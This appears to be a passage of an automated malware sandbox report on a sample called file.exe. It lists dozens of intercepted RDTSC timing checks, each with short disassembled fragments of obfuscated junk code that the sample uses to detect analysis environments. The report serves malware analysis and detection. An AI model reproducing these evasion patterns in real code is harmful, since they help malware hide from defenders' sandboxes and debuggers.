              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC3BD second address: 7AC3D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007F4F3C50B5D6h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AC3D3 second address: 7AC3E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F4F3CC87F7Bh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB2A second address: 7ABB2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB2E second address: 7ABB67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F7Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnc 00007F4F3CC87F78h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F4F3CC87F8Eh 0x0000001a jmp 00007F4F3CC87F88h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB67 second address: 7ABB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB6D second address: 7ABB71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7ABB71 second address: 7ABB7B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4F3C50B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0953 second address: 7B0974 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F4F3CC87F80h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0974 second address: 7B098C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4F3C50B5E4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B098C second address: 7B0990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0990 second address: 7B099F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B099F second address: 7B09A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B09A3 second address: 7B09B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6A83 second address: 7B6A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F7Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6A95 second address: 7B6A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B575D second address: 7B5773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F82h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5773 second address: 7B5794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4F3C50B5E9h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5E98 second address: 7B5E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5E9C second address: 7B5EA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5EA0 second address: 7B5EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4F3CC87F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6150 second address: 7B6185 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4F3C50B5E7h 0x00000008 jmp 00007F4F3C50B5E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B6185 second address: 7B618B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B62FE second address: 7B631D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F4F3C50B5E3h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B631D second address: 7B6323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B691A second address: 7B691F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB171 second address: 7BB190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4F3CC87F7Ch 0x00000008 jnc 00007F4F3CC87F76h 0x0000000e jnl 00007F4F3CC87F76h 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB190 second address: 7BB1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F4F3C50B5F6h 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 jo 00007F4F3C50B5D6h 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f push ebx 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB1B3 second address: 7BB1B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB2EA second address: 7BB302 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4F3C50B5DBh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB302 second address: 7BB30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F4F3CC87F76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BB30C second address: 7BB324 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAE70 second address: 7BAE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAE79 second address: 7BAE8B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 jne 00007F4F3C50B5E4h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAE8B second address: 7BAE91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBBE5 second address: 7BBBFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop edx 0x00000009 popad 0x0000000a pushad 0x0000000b jng 00007F4F3C50B5D8h 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBECF second address: 7BBED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BBED3 second address: 7BBF2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E8h 0x00000007 jmp 00007F4F3C50B5E8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F4F3C50B5DEh 0x00000014 jnc 00007F4F3C50B5D6h 0x0000001a jmp 00007F4F3C50B5DDh 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74938A second address: 749390 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C741C second address: 7C7422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6178 second address: 7C6195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F4F3CC87F7Fh 0x0000000b jc 00007F4F3CC87F76h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6195 second address: 7C619E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C619E second address: 7C61A4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D9AF second address: 76DD93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F4F3C50B5E6h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F4F3C50B5E1h 0x00000013 call dword ptr [ebp+12451017h] 0x00000019 jne 00007F4F3C50B600h 0x0000001f pushad 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F4F3C50B5DDh 0x00000028 push esi 0x00000029 pop esi 0x0000002a popad 0x0000002b pushad 0x0000002c jmp 00007F4F3C50B5DAh 0x00000031 jns 00007F4F3C50B5D6h 0x00000037 popad 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b push edi 0x0000003c pop edi 0x0000003d jmp 00007F4F3C50B5E1h 0x00000042 popad 0x00000043 push eax 0x00000044 push edx 0x00000045 jc 00007F4F3C50B5D6h 0x0000004b jnp 00007F4F3C50B5D6h 0x00000051 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DFB3 second address: 78DFBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4F3CC87F76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78DFBD second address: 78E004 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push edi 0x0000000e jmp 00007F4F3C50B5DFh 0x00000013 pop edi 0x00000014 pop edi 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 jne 00007F4F3C50B5DCh 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 jl 00007F4F3C50B5DCh 0x00000029 jbe 00007F4F3C50B5D6h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E004 second address: 78E009 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E009 second address: 78E057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d jmp 00007F4F3C50B5E3h 0x00000012 pop ebx 0x00000013 jmp 00007F4F3C50B5E3h 0x00000018 popad 0x00000019 pop eax 0x0000001a mov dword ptr [ebp+122D25C3h], edi 0x00000020 call 00007F4F3C50B5D9h 0x00000025 push edx 0x00000026 jc 00007F4F3C50B5DCh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E14C second address: 78E150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E1EE second address: 78E221 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 adc ch, FFFFFFE7h 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F4F3C50B5DCh 0x00000014 jmp 00007F4F3C50B5E7h 0x00000019 popad 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E3D7 second address: 78E3F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4F3CC87F7Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F4F3CC87F84h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E3F2 second address: 78E3F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E4E0 second address: 78E502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4F3CC87F87h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E8A9 second address: 78E8D1 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4F3C50B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, dword ptr [ebp+122D3775h] 0x00000013 push 0000001Eh 0x00000015 push ebx 0x00000016 mov ecx, dword ptr [ebp+122D1BC5h] 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jbe 00007F4F3C50B5D8h 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E8D1 second address: 78E8D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EA1E second address: 78EA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EA26 second address: 78EA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E3E1 second address: 78E3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F4F3C50B5E4h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D908 second address: 73D90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73D90C second address: 73D916 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4F3C50B5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C64A6 second address: 7C64B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F7Dh 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C64B8 second address: 7C64BD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6C0E second address: 7C6C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6C12 second address: 7C6C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5E6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6C2E second address: 7C6C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F89h 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F4F3CC87F76h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6C51 second address: 7C6C70 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F4F3C50B5E1h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6C70 second address: 7C6C91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3CC87F81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F4F3CC87F7Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6C91 second address: 7C6C9D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4F3C50B5DEh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6DEC second address: 7C6DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6F76 second address: 7C6F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5E5h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C6F90 second address: 7C6FE4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F4F3CC87F7Bh 0x00000008 jnc 00007F4F3CC87F76h 0x0000000e pop edi 0x0000000f jmp 00007F4F3CC87F84h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jg 00007F4F3CC87F7Ah 0x0000001d push edi 0x0000001e pop edi 0x0000001f pushad 0x00000020 popad 0x00000021 jg 00007F4F3CC87F87h 0x00000027 jmp 00007F4F3CC87F7Fh 0x0000002c pushad 0x0000002d popad 0x0000002e pushad 0x0000002f pushad 0x00000030 popad 0x00000031 pushad 0x00000032 popad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBC57 second address: 7CBC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jl 00007F4F3C50B5D6h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBC64 second address: 7CBC6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBC6A second address: 7CBC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5DEh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBC7C second address: 7CBC80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBC80 second address: 7CBCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5E4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4F3C50B5DAh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBCAB second address: 7CBCB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBCB1 second address: 7CBCBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnl 00007F4F3C50B5D6h 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBCBE second address: 7CBCDB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4F3CC87F82h 0x00000008 pushad 0x00000009 jns 00007F4F3CC87F76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBCDB second address: 7CBCEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3C50B5DEh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBE44 second address: 7CBE49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBF85 second address: 7CBF90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CC94E second address: 7CC952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CCC39 second address: 7CCC43 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4F3C50B5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD091 second address: 7CD0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jg 00007F4F3CC87F76h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CD0A3 second address: 7CD0BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4F3C50B5E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D34B0 second address: 7D34BC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 js 00007F4F3CC87F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D34BC second address: 7D34C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D34C1 second address: 7D34DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4F3CC87F82h 0x00000009 jo 00007F4F3CC87F76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D34DF second address: 7D3509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F4F3C50B5D8h 0x00000013 jmp 00007F4F3C50B5E5h 0x00000018 rdtsc
